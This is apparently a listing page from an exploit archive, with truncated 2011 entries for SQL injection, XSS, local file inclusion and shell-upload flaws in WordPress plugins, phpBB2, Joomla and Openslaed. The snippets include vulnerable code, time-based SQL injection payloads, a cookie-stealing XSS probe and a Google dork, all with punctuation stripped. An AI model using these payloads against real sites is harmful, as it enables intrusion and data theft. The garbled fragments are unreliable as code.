WordPress WP Audio Gallery Playlist 0.12 SQL Injection

Exploit Title: WordPress wp audio gallery playlist plugin prefix . "posts"; ... if isset$GET'postgallery' $query = 'SELECT FROM '.$tablename.' WHERE postparent = ''.$GET'postgallery'.'' AND postmimetype = 'audio/mpeg' ORDER BY menuorder ASC';...

WordPress Yolink Search 1.1.4 SQL Injection

Exploit Title: WordPress yolink Search plugin getresults $wpdb-prepare "SELECT ID,GUID FROM $wpdb-posts WHERE poststatus='publish' AND posttype IN $posttypein AND ID $idfrom order by ID asc LIMIT $batchsize" ; //misusage of $wpdb-prepare :...

vAuthenticate 3.0.1 - Authentication Bypass

----------------------------------------------------------------------- vAuthenticate 3.0.1 Auth Bypass by Cookie SQL Injection Vulnerability ----------------------------------------------------------------------- Author: bd0rk Contact: bd0rkathackermail.com Date: 2011 / 08 / 30 MEZ-Time: 01:35...

WordPress Plugin Couponer 1.2 - SQL Injection

Exploit Title: WordPress Couponer plugin = 1.2 SQL Injection Vulnerability Date: 2011-08-31 Author: Miroslav Stampar miroslav.stamparatgmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/couponer.zip Version: 1.2 tested Note: magicquotes has to be turned off --- PoC ---...

WordPress Plugin Advertizer 1.0 - SQL Injection

Exploit Title: WordPress Advertizer plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 --------------- Vulnerable code --------------- $res = $wpdb-getrow"SELECT limitclicks, traceclicks FROM ".$wpdb-prefix."advvbase WHERE id = '".$POSTid."' limit 1;";...

WordPress Plugin Advertizer 1.0 - SQL Injection

WordPress Plugin Advertizer 1.0 - SQL Injection Exploit Title: WordPress Advertizer plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 --------------- Vulnerable code --------------- $res = $wpdb-getrow"SELECT limitclicks, traceclicks FROM ".$wpdb-prefix."advvbase WHERE id =...

WordPress Evarisk plugin <= 5.1.3.6 SQL Injection Vulnerability

No description provided by source. Exploit Title: WordPress Evarisk plugin = 5.1.3.6 SQL Injection Vulnerability Date: 2011-08-28 Author: Miroslav Stampar miroslav.stamparatgmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/evarisk.5.1.3.6.zip Version: 5.1.3.6 tested Note:...

PhpBB2 Custom Mass PM 1.4.7 Cross Site Scripting

No description provided by source. ^ Exploit title: PhpBB2 Module "Custom Mass PM" Cross Site Scripting Vulnerability ^ Author : Silic0n sciencemedia017Atyahoo.com ^ MOD Title: Custom mass PM ^ MOD Description: Add mass PM functionnality to group members or all forums members for authorized users...

PhpBB2 Custom Mass PM 1.4.7 Cross Site Scripting

------------------------------------------------------------------------------- 0 | | | | | | TM 1 | | | | | | 0 | / | ' \ / | ' \ / |/ | |/ / \ '| ' \ / \ | 1 / / | | | | / | | | | | | | alertdocument.cookie -------------------- ^ Vulnearble code -------------------- $tousernamearray = explode...

WordPress Plugin DS FAQ 1.3.2 - SQL Injection

WordPress Plugin DS FAQ 1.3.2 - SQL Injection Exploit Title: WordPress WP DS FAQ plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0 --------------- Vulnerable code --------------- switch$POST'action' ... case 'deletefaqbook': if!isset$POST'id' error; $id = $POST'id'; ... $sql = "DELETE FRO...

WordPress Easy Contact Form Lite plugin <= 1.0.7 SQL Injection Vulnerability

No description provided by source. Exploit Title: WordPress Easy Contact Form Lite plugin = 1.0.7 SQL Injection Vulnerability Date: 2011-08-17 Author: Miroslav Stampar miroslav.stamparatgmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/easy-contact-form-lite.zip Version:...

WordPress Contus HD FLV Player 1.3 SQL Injection

Exploit Title: WordPress Contus HD FLV Player plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0&listItem=1 --------------- Vulnerable code --------------- $pid1 = $GET'playid'; foreach $GET'listItem' as $position = $item : mysqlquery"UPDATE $wpdb-prefix" . "hdflvmed2play SET sorder =...

WordPress Plugin Ajax Gallery 3.0 - SQL Injection

Exploit Title: WordPress Ajax Gallery plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0 --------------- Vulnerable code --------------- if isset $GET 'delete' && isset $GET'gId' $wpdb-query "DELETE FROM $wpdb-options WHERE optionname='agItem' and optionid=".$GET'gId' ; echo "Galeria...

WordPress Plugin Global Content Blocks 1.2 - SQL Injection

Exploit Title: WordPress Global Content Blocks plugin 0 // intval"1a" = 1 : $entry = $wpdb-getrow"select from ".$wpdb-prefix."gcb where id=".$id; $finaltext = base64encode$entry-name."". base64encode$entry-description."". base64encode$entry-value."". base64encode$entry-type;...

WordPress Plugin IP-Logger 3.0 - SQL Injection

WordPress Plugin IP-Logger 3.0 - SQL Injection Exploit Title: WordPress IP-Logger plugin = 3.0 SQL Injection Vulnerability Date: 2011-08-16 Author: Miroslav Stampar miroslav.stamparatgmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/ip-logger.3.0.zip Version: 3.0 tested ---...

WordPress Plugin IP-Logger 3.0 - SQL Injection

Exploit Title: WordPress IP-Logger plugin = 3.0 SQL Injection Vulnerability Date: 2011-08-16 Author: Miroslav Stampar miroslav.stamparatgmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/ip-logger.3.0.zip Version: 3.0 tested --- PoC ---...

WordPress Plugin Social Slider 5.6.5 - SQL Injection

Exploit Title: Social Slider...

Joomla Component mod_spo SQL Injection Vulnerability

Exploit for php platform in category web applications Exploit Title: Simple Page Option LFI Google Dork: inurl:modspo Date: 15/07/2011 Author: SeguridadBlanca.Blogspot.com or SeguridadBlanca Software Link: http://joomlacode.org/gf/download/frsrelease/11841/47776/modspo1.5.16.zip Version: 1.5.x...

Joomla Simple Page Option Local File Inclusion

Simple Page Option – LFI Vulnerable-Code: $slang =& JRequest::getVar'spositelang'; fileexistsdirnameFILE.DS.'languages'.DS.$slang.'.php' ? includedirnameFILE.DS.'languages'.DS.$slang.'.php' : includedirnameFILE.DS.'languages'.DS.'english.php'; Vulnerable-Var: spositelang= Expl0iting:...

Openslaed 1.2 Remote Shell Upload

?php / Vendor: www.slaed.net Download : http://www.slaed.net/uploads/files/public/openslaed.zip exploited by ..: eidelweiss Affected: Version 1.2 Other or lowers version may also be affected Greetz: yogyacarderlink Team, devilzc0de Team, Nofia Fitri unyu², whitehat, petimati, psycothicgirl, viska...